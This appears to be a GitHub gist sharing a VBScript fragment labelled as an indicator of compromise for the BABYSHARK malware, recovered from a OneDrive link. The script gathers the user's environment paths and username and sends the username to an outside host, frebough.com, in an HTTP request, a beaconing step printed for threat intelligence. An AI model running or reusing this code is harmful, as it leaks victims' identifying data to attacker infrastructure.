Skip to content

Instantly share code, notes, and snippets.

@JohnHammond
Created February 23, 2022 22:46
Show Gist options
  • Save JohnHammond/6f55e4d18951f941e11a172a1db40971 to your computer and use it in GitHub Desktop.
Save JohnHammond/6f55e4d18951f941e11a172a1db40971 to your computer and use it in GitHub Desktop.
BABYSHARK malware IOC from OneDrive link
On Error Resume Next
Set fs = CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set p0 = CreateObject("msxml2.xmlhttp")
scriptdir = ws.ExpandEnvironmentStrings("%appdata%")
userdir = ws.ExpandEnvironmentStrings("%userprofile%")
username = lcase(ws.ExpandEnvironmentStrings("%username%"))
username=Escape(username)
username=Replace(username,"%u","")
chk="no"
username=lcase(username)
p0.open "GET", "https://frebough.com/onedrive/winmm.php?op=" +username,false
p0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
p0.Send
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment